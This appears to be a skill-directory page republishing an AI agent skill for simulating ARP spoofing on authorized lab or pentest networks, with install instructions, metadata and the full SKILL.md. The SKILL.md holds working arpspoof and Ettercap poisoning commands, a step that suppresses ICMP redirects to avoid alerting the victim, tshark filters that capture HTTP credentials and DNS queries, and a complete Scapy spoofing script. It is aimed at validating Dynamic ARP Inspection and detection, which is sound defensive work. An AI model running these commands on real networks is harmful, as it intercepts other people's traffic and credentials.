Agent skill

Performing Arp Spoofing Attack Simulation

by mukul975 in mukul975/Anthropic-Cybersecurity-Skills

Simulates ARP spoofing/cache-poisoning attacks in authorized lab or pentest environments using arpspoof, Ettercap, and Scapy to demonstrate man-in-the-middle risk and validate Dynamic ARP…

Apache-2.0Auto-check: notesSecurity

Install Performing Arp Spoofing Attack Simulation

skills CLI
$ npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill performing-arp-spoofing-attack-simulation -a claude-code

Project install by default; add -g for ~/.claude/skills/.

GitHub CLI
$ gh skill install mukul975/Anthropic-Cybersecurity-Skills performing-arp-spoofing-attack-simulation --agent claude-code

Project scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).

Manual copy
$ git clone --depth 1 https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git skills-src && mkdir -p .claude/skills && cp -r skills-src/skills/performing-arp-spoofing-attack-simulation .claude/skills/performing-arp-spoofing-attack-simulation && rm -rf skills-src

Use ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.

Claude Code skills documentation · loads skills from .claude/skills/

Facts

Skill name
performing-arp-spoofing-attack-simulation
GitHub stars
34k
Token cost
~2.8k tokens
SKILL.md length
659 words
Files
4 (incl. scripts, references)
Skills in repo
637
Repo updated
First seen
Licence
Apache-2.0

At a glance

Simulates ARP spoofing/cache-poisoning attacks in authorized lab or pentest environments using arpspoof, Ettercap, and Scapy to demonstrate man-in-the-middle risk and validate Dynamic ARP…

  • Works in 6 steps: Enumerate the Target Network Segment → Enable IP Forwarding → Execute ARP Spoofing with arpspoof → …
  • Testing whether switches
  • SKILL.md covers When to Use, Prerequisites, Workflow and Key Concepts, plus 3 more sections
  • Runs Python scripts from its folder

What it does

Performing Arp Spoofing Attack Simulation is an agent skill from mukul975/Anthropic-Cybersecurity-Skills. Simulates ARP spoofing/cache-poisoning attacks in authorized lab or pentest environments using arpspoof, Ettercap, and Scapy to demonstrate man-in-the-middle risk and validate Dynamic ARP Inspection, port security, and network monitoring detections. Use when testing whether switches, IDS/IPS, or a SIEM detect ARP spoofing under written authorization; do not use on production networks without explicit approval.

Its SKILL.md is about 2.8k tokens, which your agent loads only when the skill is triggered. The skill folder holds 5 other files, including scripts and reference files (for example `references/api-reference.md` and `scripts/agent.py`).

It sits in Security, covering Penetration testing, Security operations and Authorization and RBAC. The repository describes itself as: 817 structured cybersecurity skills for AI agents · Mapped to 6 frameworks: MITRE ATT&CK, NIST CSF 2.0, MITRE ATLAS, D3FEND, NIST AI RMF & MITRE F3 (Fight Fraud) · agentskills.io…. The licence is Apache-2.0.

When your agent uses it

  • Testing whether switches
  • A SIEM detect ARP spoofing under written authorization
  • Do not use on production networks without explicit approval

Example prompts

  • “Use the performing-arp-spoofing-attack-simulation skill to simulate ARP spoofing/cache-poisoning attacks in authorized lab or pentest environments…”
  • “/performing-arp-spoofing-attack-simulation”

Requirements

  • Python 3

Workflow steps

6 steps, taken from the step headings in SKILL.md.

  1. Enumerate the Target Network Segment
  2. Enable IP Forwarding
  3. Execute ARP Spoofing with arpspoof
  4. Capture and Analyze Intercepted Traffic
  5. Demonstrate Impact with Scapy (Custom ARP Packets)
  6. Verify Detection and Cleanup

What it can do on your machine

Read from SKILL.md and the folder at commit 54a7988. It shows what the files ask for, not the result of running them.

  • Tool permissions

    Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.

    From allowed-tools in the SKILL.md frontmatter.

  • Runs code

    Ships 1 file in scripts/ (Python), which the agent can run.

    From the folder's file list and the shell code blocks in SKILL.md.

  • Network

    No URLs in SKILL.md.

    From URLs in SKILL.md, links to its own repository left out.

  • Credentials

    Names no API keys, tokens, secrets or passwords.

    From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.

Context cost

Performing Arp Spoofing Attack Simulation loads about 2.8k tokens when it runs, and up to ~3.5k if it reads all its reference files. Until then it costs about 114 tokens; SKILL.md has 659 words of instructions outside code blocks.

Always · name and description, kept in context so the agent knows when to use it
~114
When it runs · the whole SKILL.md, loaded when a task matches
~2.8k
With references · SKILL.md plus every file in references/, read only if the agent opens them
~3.5k

Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.

Safety

Auto-check: notes

The automated check noted patterns worth knowing about, such as sudo or a known installer.

  • NoteRuns commands with sudoSKILL.md:83
    sudo sysctl -w net.ipv4.ip_forward=1
  • NoteRuns commands with sudoSKILL.md:90
    sudo sysctl -w net.ipv4.conf.all.send_redirects=0
  • NoteRuns commands with sudoSKILL.md:91
    sudo sysctl -w net.ipv4.conf.eth0.send_redirects=0
  • NoteRuns commands with sudoSKILL.md:98
    sudo arpspoof -i eth0 -t 192.168.1.50 -r 192.168.1.1
  • NoteRuns commands with sudoSKILL.md:101
    sudo arpspoof -i eth0 -t 192.168.1.1 -r 192.168.1.50
  • NoteRuns commands with sudoSKILL.md:104
    sudo ettercap -T -q -i eth0 -M arp:remote /192.168.1.50// /192.168.1.1//
  • NoteRuns commands with sudoSKILL.md:111
    sudo tcpdump -i eth0 -w mitm_capture.pcap host 192.168.1.50
  • NoteRuns commands with sudoSKILL.md:114
    sudo tshark -i eth0 -Y "http.request.method == POST" \
  • NoteRuns commands with sudoSKILL.md:118
    sudo tshark -i eth0 -Y "dns.qry.name and ip.src == 192.168.1.50" \
  • NoteRuns commands with sudoSKILL.md:122
    sudo ettercap -T -q -i eth0 -M arp:remote /192.168.1.50// /192.168.1.1// \

Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); the scripts in this folder are not scanned.

SKILL.md

The full file from mukul975/Anthropic-Cybersecurity-Skills at commit 54a7988, republished under its Apache-2.0 licence (© mukul975). 659 words, ~2,835 tokens.

Download SKILL.mdSave it as .claude/skills/performing-arp-spoofing-attack-simulation/SKILL.md (or your agent's skills folder). This skill also uses 3 other files; get the full folder from GitHub.
name
performing-arp-spoofing-attack-simulation
description
Simulates ARP spoofing/cache-poisoning attacks in authorized lab or pentest environments using arpspoof, Ettercap, and Scapy to demonstrate man-in-the-middle risk and validate Dynamic ARP Inspection, port security, and network monitoring detections. Use when testing whether switches, IDS/IPS, or a SIEM detect ARP spoofing under written authorization; do not use on production networks without explicit approval.
domain
cybersecurity
subdomain
network-security
tags
network-security, arp-spoofing, mitm, ettercap, layer2-attack
version
1.0
author
mahipal
license
Apache-2.0
nist_csf
PR.IR-01, DE.CM-01, ID.AM-03, PR.DS-02
mitre_attack
T1046, T1040, T1557, T1071

Performing ARP Spoofing Attack Simulation

When to Use

  • Testing whether network switches and infrastructure properly implement Dynamic ARP Inspection (DAI)
  • Demonstrating man-in-the-middle attack risks to stakeholders during authorized security assessments
  • Validating that network monitoring tools (IDS/IPS, SIEM) detect ARP cache poisoning attempts
  • Assessing the effectiveness of port security, 802.1X, and VLAN segmentation controls
  • Training SOC analysts to recognize ARP spoofing indicators in network traffic

Do not use on production networks without explicit written authorization and a rollback plan, against networks carrying critical or life-safety traffic, or as a denial-of-service attack vector.

Prerequisites

  • Written authorization specifying in-scope network segments for ARP spoofing simulation
  • Kali Linux or similar penetration testing distribution with arpspoof, Ettercap, and Scapy installed
  • Direct Layer 2 access to the target network segment (same VLAN as target hosts)
  • IP forwarding knowledge and ability to enable/disable packet forwarding on the attacker machine
  • Wireshark or tcpdump for capturing traffic to verify interception
  • Isolated lab environment or approved production test window

Legal Notice: This skill is for authorized security testing and educational purposes only. Unauthorized use against systems you do not own or have written permission to test is illegal and may violate computer fraud laws.

Workflow

Step 1: Enumerate the Target Network Segment
bash
# Discover hosts on the local subnet
nmap -sn -PR 192.168.1.0/24 -oG arp_discovery.txt

# Identify the default gateway
ip route show default
# Output: default via 192.168.1.1 dev eth0

# Identify target hosts and their MAC addresses
arp-scan -l -I eth0

# Verify the current ARP table
arp -a

# Note the gateway IP (192.168.1.1) and target host IP (192.168.1.50)
# Record their legitimate MAC addresses for verification and cleanup
Step 2: Enable IP Forwarding
bash
# Enable IPv4 forwarding to relay packets between victim and gateway
sudo sysctl -w net.ipv4.ip_forward=1

# Verify forwarding is enabled
cat /proc/sys/net/ipv4/ip_forward
# Should output: 1

# Optionally prevent ICMP redirects that could alert the victim
sudo sysctl -w net.ipv4.conf.all.send_redirects=0
sudo sysctl -w net.ipv4.conf.eth0.send_redirects=0
Step 3: Execute ARP Spoofing with arpspoof
bash
# Spoof the gateway to the target (tell target we are the gateway)
sudo arpspoof -i eth0 -t 192.168.1.50 -r 192.168.1.1

# In a separate terminal, spoof the target to the gateway (bidirectional)
sudo arpspoof -i eth0 -t 192.168.1.1 -r 192.168.1.50

# Alternative: Use Ettercap for unified bidirectional spoofing
sudo ettercap -T -q -i eth0 -M arp:remote /192.168.1.50// /192.168.1.1//
Step 4: Capture and Analyze Intercepted Traffic
bash
# Capture all traffic flowing through the attacker machine
sudo tcpdump -i eth0 -w mitm_capture.pcap host 192.168.1.50

# Use tshark to capture HTTP credentials in real-time
sudo tshark -i eth0 -Y "http.request.method == POST" \
  -T fields -e ip.src -e http.host -e http.request.uri -e urlencoded-form.value

# Capture DNS queries from the victim
sudo tshark -i eth0 -Y "dns.qry.name and ip.src == 192.168.1.50" \
  -T fields -e frame.time -e dns.qry.name

# Use Ettercap with password collection filters
sudo ettercap -T -q -i eth0 -M arp:remote /192.168.1.50// /192.168.1.1// \
  -w ettercap_capture.pcap
Step 5: Demonstrate Impact with Scapy (Custom ARP Packets)
python
#!/usr/bin/env python3
"""ARP spoofing demonstration using Scapy for authorized security testing."""

from scapy.all import Ether, ARP, sendp, srp, conf
import time
import sys

conf.verb = 0

def get_mac(ip, iface="eth0"):
    """Resolve IP to MAC address via ARP request."""
    ans, _ = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip),
                 timeout=2, iface=iface)
    if ans:
        return ans[0][1].hwsrc
    return None

def spoof(target_ip, spoof_ip, target_mac, iface="eth0"):
    """Send spoofed ARP reply to target."""
    packet = ARP(op=2, pdst=target_ip, hwdst=target_mac, psrc=spoof_ip)
    sendp(Ether(dst=target_mac) / packet, iface=iface, verbose=False)

def restore(target_ip, gateway_ip, target_mac, gateway_mac, iface="eth0"):
    """Restore legitimate ARP entries."""
    packet = ARP(op=2, pdst=target_ip, hwdst=target_mac,
                 psrc=gateway_ip, hwsrc=gateway_mac)
    sendp(Ether(dst=target_mac) / packet, iface=iface, count=5, verbose=False)

if __name__ == "__main__":
    target_ip = "192.168.1.50"
    gateway_ip = "192.168.1.1"
    iface = "eth0"

    target_mac = get_mac(target_ip, iface)
    gateway_mac = get_mac(gateway_ip, iface)

    if not target_mac or not gateway_mac:
        print("[!] Could not resolve MAC addresses. Exiting.")
        sys.exit(1)

    print(f"[*] Target: {target_ip} ({target_mac})")
    print(f"[*] Gateway: {gateway_ip} ({gateway_mac})")
    print("[*] Starting ARP spoofing... Press Ctrl+C to stop.")

    try:
        packets_sent = 0
        while True:
            spoof(target_ip, gateway_ip, target_mac, iface)
            spoof(gateway_ip, target_ip, gateway_mac, iface)
            packets_sent += 2
            print(f"\r[*] Packets sent: {packets_sent}", end="")
            time.sleep(1)
    except KeyboardInterrupt:
        print("\n[*] Restoring ARP tables...")
        restore(target_ip, gateway_ip, target_mac, gateway_mac, iface)
        restore(gateway_ip, target_ip, gateway_mac, target_mac, iface)
        print("[*] ARP tables restored. Exiting.")
Step 6: Verify Detection and Cleanup
bash
# On the target machine, check for ARP cache poisoning indicators
arp -a | grep 192.168.1.1
# If spoofed, the gateway MAC will match the attacker's MAC

# Check IDS/SIEM for ARP spoofing alerts
# Snort rule that should trigger:
# alert arp any any -> any any (msg:"ARP Spoof Detected"; arp.opcode:2;
#   threshold:type both, track by_src, count 30, seconds 10; sid:1000010;)

# Stop the attack and restore ARP tables
# Ctrl+C on arpspoof/ettercap sessions

# Disable IP forwarding
sudo sysctl -w net.ipv4.ip_forward=0

# Manually restore ARP entries on affected hosts (if needed)
# On target: arp -d 192.168.1.1 && ping -c 1 192.168.1.1
# On gateway: arp -d 192.168.1.50 && ping -c 1 192.168.1.50

# Verify legitimate MAC addresses are restored
arp -a

Key Concepts

TermDefinition
ARP Cache PoisoningTechnique of sending fraudulent ARP replies to associate the attacker's MAC address with another host's IP address in the target's ARP cache
Gratuitous ARPARP reply sent without a corresponding request, used by ARP spoofing tools to update a target's ARP cache with false entries
Dynamic ARP Inspection (DAI)Switch-level security feature that validates ARP packets against the DHCP snooping binding database and drops invalid ARP traffic
IP ForwardingKernel-level setting that allows a host to relay packets between network interfaces, required for transparent man-in-the-middle interception
DHCP SnoopingSwitch security feature that builds a trusted binding table of IP-to-MAC-to-port mappings, serving as the foundation for DAI validation

Tools & Systems

  • arpspoof (dsniff suite): Simple command-line tool that sends continuous spoofed ARP replies to redirect traffic between two targets
  • Ettercap: Comprehensive suite for man-in-the-middle attacks supporting ARP spoofing, DNS spoofing, content filtering, and credential capture
  • Scapy: Python packet manipulation library for crafting custom ARP packets with full control over all header fields
  • arp-scan: Network scanning tool that sends ARP requests to discover all hosts on a local network segment
  • Wireshark: Packet analyzer for verifying ARP spoofing success and capturing intercepted traffic for analysis
Show full SKILL.md (225 more words)Show less

Common Scenarios

Scenario: Testing Dynamic ARP Inspection Effectiveness on Enterprise Switches

Context: A network team deployed Cisco DAI on all access-layer switches and needs to validate that ARP spoofing attempts are properly detected and blocked. The test is authorized on a dedicated VLAN (VLAN 100) with three test hosts and one attacker machine connected to the same switch.

Approach:

  1. Document baseline ARP tables on all hosts and the legitimate MAC-IP bindings in the DHCP snooping database
  2. Run arpspoof from the attacker machine targeting the default gateway and a test workstation
  3. Verify that the switch drops spoofed ARP packets by checking DAI statistics: show ip arp inspection statistics vlan 100
  4. Confirm the test workstation's ARP cache still shows the legitimate gateway MAC address
  5. Temporarily disable DAI on the test VLAN and repeat the attack to confirm it succeeds without the control
  6. Re-enable DAI and document results showing the control is effective
  7. Verify that IDS alerts were generated for both the blocked and unblocked attack attempts

Pitfalls:

  • Running ARP spoofing on a VLAN without DAI and accidentally disrupting legitimate traffic
  • Forgetting to enable IP forwarding, causing a denial-of-service instead of transparent interception
  • Not restoring ARP tables after testing, leaving hosts with stale cache entries
  • Testing on a trunk port instead of an access port, potentially affecting multiple VLANs

Output Format

## ARP Spoofing Simulation Report

**Test ID**: NET-ARP-001
**Date**: 2024-03-15 14:00-15:00 UTC
**Target VLAN**: VLAN 100 (192.168.1.0/24)
**Attacker**: 192.168.1.99 (AA:BB:CC:DD:EE:FF)
**Target**: 192.168.1.50 (00:11:22:33:44:55)
**Gateway**: 192.168.1.1 (00:AA:BB:CC:DD:01)

### Test Results

| Test | DAI Status | ARP Spoof Result | Traffic Intercepted |
|------|------------|-------------------|---------------------|
| Test 1 | Enabled | Blocked (switch dropped 847 packets) | No |
| Test 2 | Disabled | Successful (target ARP cache poisoned) | Yes - 23 HTTP sessions |
| Test 3 | Re-enabled | Blocked | No |

### Detection Coverage
- DAI: PASS - Dropped all spoofed ARP replies when enabled
- IDS (Snort): PASS - Generated alert SID:1000010 within 15 seconds
- SIEM: PASS - Alert correlated and escalated within 2 minutes

### Recommendations
1. Maintain DAI enabled on all access VLANs (currently disabled on VLANs 200, 210)
2. Enable DHCP snooping rate limiting to prevent DHCP starvation attacks
3. Deploy 802.1X port authentication to complement ARP inspection

© mukul975, Apache-2.0. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file

Files

SKILL.md and 3 other files (scripts, references) in skills/performing-arp-spoofing-attack-simulation of mukul975/Anthropic-Cybersecurity-Skills.

  • SKILL.md
  • LICENSE
  • references/api-reference.md
  • scripts/agent.py

Open the folder on GitHubat commit 54a7988

Compare with similar skills

Performing Arp Spoofing Attack Simulation next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.

Performing Arp Spoofing Attack Simulation compared with similar skills
SkillStarsUsed inTokensAuto-checkLicenceRepo updated
Performing Arp Spoofing Attack Simulation this skillmukul975/Anthropic-Cybersecurity-Skills34k—~2.8kAutomated safety check: NotesApache-2.0
Cis ControlsSushegaad/Claude-Skills-Governance-Risk-and-Compliance9421 repos~4.2kAutomated safety check: PassMIT
Strix Code Vulnerability Scanusestrix/strix67k—~1.1kAutomated safety check: PassApache-2.0
Idor Testingzebbern/claude-code-guide4.7k8 repos~3.1kAutomated safety check: PassMIT
Cors TestingNeoTheCapt/RedteamAgent142—~904Automated safety check: PassNone
Cybersecurityohmyjahh/xquads-squads276—~895Automated safety check: PassMIT

Similar skills

  • Cis Controls

    Sushegaad/Claude-Skills-Governance-Risk-and-Compliance

    Expert CIS Controls v8 (CIS Top 18) advisor — implementation group scoping (IG1/IG2/IG3), control gap assessments, safeguard-level guidance, asset inventory, software inventory, data protection…

    942 GitHub starsUsed in 1 repo~4.2k tokens
    Legal & ComplianceAuto-check passed
  • Runs a Strix white-box security review that reads the source, then exploits what it finds in a sandbox so each reported issue has a proof-of-concept.

    67k GitHub stars~1.1k tokensUpdated today
    SecurityAuto-check passed
  • Idor Testing

    zebbern/claude-code-guide

    This skill should be used when the user asks to "test for insecure direct object references," "find IDOR vulnerabilities," "exploit broken access control," "enumerate user IDs or object references,"…

    4.7k GitHub starsUsed in 8 repos~3.1k tokens
    SecurityAuto-check passed
  • Cors Testing

    NeoTheCapt/RedteamAgent

    CORS misconfiguration testing for data theft and access control bypass

    142 GitHub stars~904 tokensUpdated 2 mo ago
    SecurityAuto-check passed
  • Cybersecurity

    ohmyjahh/xquads-squads

    Squad de 15 agentes de seguranca ofensiva e defensiva (Georgia Weidman, Peter Kim, Jim Manico, Chris Sanders, Omar Santos, Marcus Carey) cobrindo pentest, red team, blue team, AppSec, recon e…

    276 GitHub stars~895 tokensUpdated 9 days ago
    SecurityAuto-check passed
  • Recon Nmap

    AgentSecOps/SecOpsAgentKit

    Network reconnaissance and security auditing using Nmap for port scanning, service enumeration, and vulnerability detection.

    220 GitHub starsUsed in 1 repo~4.6k tokens
    SecurityAuto-check: notes

More from mukul975/Anthropic-Cybersecurity-Skills

All 637 skills in this repo
  • Campaign Attribution Evidence Analysis

    mukul975/Anthropic-Cybersecurity-Skills

    Weighs infrastructure, TTP, malware code and timing evidence with the Diamond Model and competing hypotheses to reach a confidence-rated attribution.

    34k GitHub stars~2.3k tokensUpdated 1 mo ago
    Auto-check passed
  • Go Malware Analysis in Ghidra

    mukul975/Anthropic-Cybersecurity-Skills

    Walks through reverse engineering Go-compiled malware in Ghidra: parsing buildinfo and pclntab, recovering stripped function names and extracting dependencies.

    34k GitHub stars~2.8k tokensUpdated 1 mo ago
    Auto-check passed
  • LNK and Jump List Forensics

    mukul975/Anthropic-Cybersecurity-Skills

    Guides forensic analysis of Windows LNK shortcut files and Jump Lists with LECmd, JLECmd and manual parsing to show file access and program execution.

    34k GitHub stars~2.8k tokensUpdated 1 mo ago
    Auto-check passed
  • Malware Persistence Analysis with Autoruns

    mukul975/Anthropic-Cybersecurity-Skills

    Hunts Windows malware persistence with Sysinternals Autoruns, covering run keys, services, scheduled tasks and drivers, with baseline comparison.

    34k GitHub stars~1.2k tokensUpdated 1 mo ago
    Auto-check passed
  • NTFS MFT Deleted File Recovery

    mukul975/Anthropic-Cybersecurity-Skills

    Guides a Windows forensic examination of the NTFS Master File Table to recover deleted-file evidence, build timelines and spot timestomping.

    34k GitHub stars~2.7k tokensUpdated 1 mo ago
    Auto-check passed
  • Network Covert Channel Analysis

    mukul975/Anthropic-Cybersecurity-Skills

    Detects DNS tunneling, ICMP exfiltration and HTTP-based covert channels in packet captures and DNS logs when hunting for hidden command-and-control traffic.

    34k GitHub stars~2k tokensUpdated 1 mo ago
    Auto-check passed

Categories

Questions about Performing Arp Spoofing Attack Simulation

What does Performing Arp Spoofing Attack Simulation do?

Simulates ARP spoofing/cache-poisoning attacks in authorized lab or pentest environments using arpspoof, Ettercap, and Scapy to demonstrate man-in-the-middle risk and validate Dynamic ARP…. Performing Arp Spoofing Attack Simulation is an agent skill from mukul975/Anthropic-Cybersecurity-Skills. Simulates ARP spoofing/cache-poisoning attacks in authorized lab or pentest environments using arpspoof, Ettercap, and Scapy to demonstrate man-in-the-middle risk and validate Dynamic ARP Inspection, port security, and network monitoring detections.

When should I use Performing Arp Spoofing Attack Simulation?

Performing Arp Spoofing Attack Simulation fits situations like: testing whether switches; A SIEM detect ARP spoofing under written authorization; do not use on production networks without explicit approval.

How do I install Performing Arp Spoofing Attack Simulation in Claude Code?

Run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill performing-arp-spoofing-attack-simulation -a claude-code`. Or copy the skill folder (skills/performing-arp-spoofing-attack-simulation in mukul975/Anthropic-Cybersecurity-Skills) into .claude/skills/performing-arp-spoofing-attack-simulation in your project. Claude Code loads it when a task matches its description.

How do I install Performing Arp Spoofing Attack Simulation in Codex?

Run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill performing-arp-spoofing-attack-simulation -a codex`. Or copy the skill folder (skills/performing-arp-spoofing-attack-simulation in mukul975/Anthropic-Cybersecurity-Skills) into .agents/skills/performing-arp-spoofing-attack-simulation in your project. Codex loads it when a task matches its description.

Can I use Performing Arp Spoofing Attack Simulation in Cursor, Gemini CLI or GitHub Copilot?

Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add mukul975/Anthropic-Cybersecurity-Skills --skill performing-arp-spoofing-attack-simulation -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/performing-arp-spoofing-attack-simulation, .gemini/skills/performing-arp-spoofing-attack-simulation, .github/skills/performing-arp-spoofing-attack-simulation and .opencode/skills/performing-arp-spoofing-attack-simulation in your project.

What does Performing Arp Spoofing Attack Simulation need to run?

Going by SKILL.md and its folder, Performing Arp Spoofing Attack Simulation needs Python for the scripts in its folder. Our summary lists: Python 3.

Does Performing Arp Spoofing Attack Simulation access the network?

SKILL.md contains no URLs. Any network use would come from the scripts or tools the agent runs. This is read from the text; nothing was executed.

Is Performing Arp Spoofing Attack Simulation safe to install?

Our automated static check of SKILL.md found notes only (runs commands with sudo), nothing it rates as a warning. It is not a guarantee. The check reads SKILL.md only: the scripts in the folder are not scanned, so read them before running anything.

What licence does Performing Arp Spoofing Attack Simulation use?

Performing Arp Spoofing Attack Simulation is published under the Apache-2.0 licence (declared in SKILL.md). It allows redistribution, so the full SKILL.md is shown on this page.

How many tokens does Performing Arp Spoofing Attack Simulation use?

About 2.8k tokens (SKILL.md is roughly 11k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full. Its references folder adds about 628 tokens, read only when the agent opens those files.

What are the alternatives to Performing Arp Spoofing Attack Simulation?

Skills that share tags, products or a category with Performing Arp Spoofing Attack Simulation: Cis Controls (Sushegaad/Claude-Skills-Governance-Risk-and-Compliance, 942 stars), Strix Code Vulnerability Scan (usestrix/strix, 67k stars), Idor Testing (zebbern/claude-code-guide, 4.7k stars) and Cors Testing (NeoTheCapt/RedteamAgent, 142 stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.

Who maintains Performing Arp Spoofing Attack Simulation?

mukul975 (a GitHub user) maintains it in mukul975/Anthropic-Cybersecurity-Skills, which has 33,922 GitHub stars. The repository holds 637 skills in this directory. The repository was last updated on August 31, 2026.

Source: mukul975/Anthropic-Cybersecurity-Skills on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.